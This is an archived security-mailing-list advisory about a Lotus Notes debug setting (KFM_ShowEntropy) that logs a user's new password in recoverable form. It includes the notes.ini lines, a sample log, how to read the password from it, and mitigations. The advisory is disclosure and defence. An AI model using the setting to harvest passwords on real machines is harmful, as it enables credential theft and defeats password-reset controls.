Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] Lotus Notes Password Exposure

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] Lotus Notes Password Exposure
Date: 22 Jul 2007 14:05:49 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Lotus Notes Password Exposure
------------------------------------------------------------------------


SUMMARY

A document that discusses the possibility of using an unpublished Lotus 
Notes' debug variable in an attack to learn a Notes.id password. This 
notes.ini parameter is used for troubleshooting password quality and can 
be used to log the user's password. However, in order to utilize this 
feature, the following must be true.

(1) Attacker must compromise the workstation in order to implement this 
parameter or have administrative rights to push out a notes.ini change via 
a policy

(2) User must restart the Notes client

(3) User must be persuaded to change their Notes.id password

(4) Attacker must gather the information from the debug outfile

DETAILS

A debug function in version 5 and up of Lotus Notes can be used to write a 
file containing the new password in plain text when a user password is 
changed. This function has been designed to bring more transparency into 
password quality verification. If two additional lines are entered in the 
Notes.INI configuration file, Notes will log the evaluation:

KFM_ShowEntropy=1
Debug_Outfile=c:\testvowe.txt

During the next password change, Notes will create a file with the 
following content:

testvowe_TLANB_2007_07_18@17_07_33.txt
18.07.2007 17:07:36 Lotus Notes client started
18.07.2007 17:07:47 Index update process started
Entering SpellCheckInit
entropy.c SpellCheckAccess Get 13A834 0
Initializing spell checking code
SPELLInitialize succeeded; spell checking DLL loaded
SPELLInitMainDict succeeded
SPELLInitUserDict succeeded
Password Entropy: spell checking code initialized
SpellCheckInit succeeded
Bytes per char: 1
Distribution base multiplier: 6
Resulting entropy limit: 60
[c]alp[c]: 0
[c]alp[t]: 0
[-]alp-s[-]: 18
[t]nalp-s[t]: 18
[t]alp[e]: 18
[t]alp[s]: 18
[t]alp[t]: 18
Testing word: [test]
Searching for [test]
Found [test], worth 12 bits
[2]alp-s[2]: 36
[2]nalp[3]: 42
[2]nalp[4]: 48
Entropy as determined by the state machine: 48

Entropy Limit: 60
Current Entropy: 48
Final Entropy: 48

Final Entropy: 48 bits, 12 chars
entropy.c SpellCheckAccess Put 422EB60 F01069BD

The password is found in the lines after "Resulting entropy limit: 60" and 
is made up of single characters in square brackets: ct-test234.

IBM published the debug parameter as support document, but has removed it 
recently. At present, the document can still be read in the  
<http://64.233.183.104/search?q=cache:0AKDTeu1macJ:www-1.ibm.com/support/docview.wss%3Fuid%3Dswg21196682+kfm_showentropy&hl=en&ct=clnk&cd=3&gl=uk>
 Google cache.

Since the Notes.INI file on a user s hard disk must be manipulated, 
physical access to the system is required to exploit this flaw. But there 
are various possibilities within Notes to manipulate this file, which can, 
in turn, also be used to protect systems from this vulnerability:
1. From Notes 7 upwards, settings in NOTES.INI can be made based on 
workstation policies, which makes it possible to enforce the setting 
"KFM_ShowEntropy=0".

2. An undocumented possibility of making the same setting exists in Notes 
6. To do so, a field with the name $PrefKFM_ShowEntropy with the value 0 
must be added to the policy document.

3. Alternatively, the setting may be made with the following short 
Lotuscript:

      Dim s As New NotesSession
      Call s.SetEnvironmentVar("KFM_ShowEntropy","0", true)

If this script is loaded automatically when the mail database of all users 
is opened, this setting is made each time. See also the  
<http://www-1.ibm.com/support/docview.wss?rs=203&uid=swg21210786> support 
document provided by IBM.

Assessment:
Notes uses the password to protect the certificate storage Notes.ID used 
by every user for authentication. This file is encrypted or decrypted with 
the user password. Together with the Notes certificates, Notes.ID also 
stores the user's private key and X.509 certificates, where required. For 
this reason, it is of utmost importance to ensure that nobody can create a 
copy of the password and Notes.ID at the same time. If somebody gains 
concurrent access to both the log file and the Notes.ID, this person can 
authenticate himself to Notes at any time.

Even though administrators can eliminate exploitation of this debug 
function in most cases, a Notes administrator with appropriate privileges 
is able to discover all user passwords.

Unlike under Windows, the Notes administrator is not able to reset 
forgotten passwords, since passwords are only required for decrypting the 
Notes.ID. Some Notes customers have implemented complex solutions to allow 
for the central storage of password changes, while resetting passwords is 
only possible based on the four-eye principle, i.e. administration and 
revision must work together to do so. The debug function makes it possible 
to bypass this security measure.

Update:
In a  <http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21266085> 
Response to 'Password exposure in Lotus Notes' by heise Security IBM 
essentially confirms the vulnerability. They rate the severity as rather 
low, (Overall CVSS Score: 0.9) but do not discuss the numerous 
possibilties for remote administration of Notes clients. This can only be 
reliably prevented by using all available access restrictions (ECL = 
Execution Control Lists). This is often not the case. According to IBM 
"Lotus Notes versions 8.0, 7.0.3 and all future versions will contain a 
fix that will remove the use of this undocumented debug variable."


ADDITIONAL INFORMATION

The information has been provided by  <mailto:ju@heisec.de> Juergen 
Schmidt.
The original article can be found at:  
<http://www.heise-security.co.uk/news/92958> 
http://www.heise-security.co.uk/news/92958



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Lotus Notes Password Exposure, SecuriTeam <=
Previous by Date:  [NEWS] Firefox Flaw Allows to Steal the User's Passwords, SecuriTeam
Next by Date:  [NEWS] BIND 9 DNS Cache Poisoning, SecuriTeam
Previous by Thread:  [NEWS] Firefox Flaw Allows to Steal the User's Passwords, SecuriTeam
Next by Thread:  [NEWS] BIND 9 DNS Cache Poisoning, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]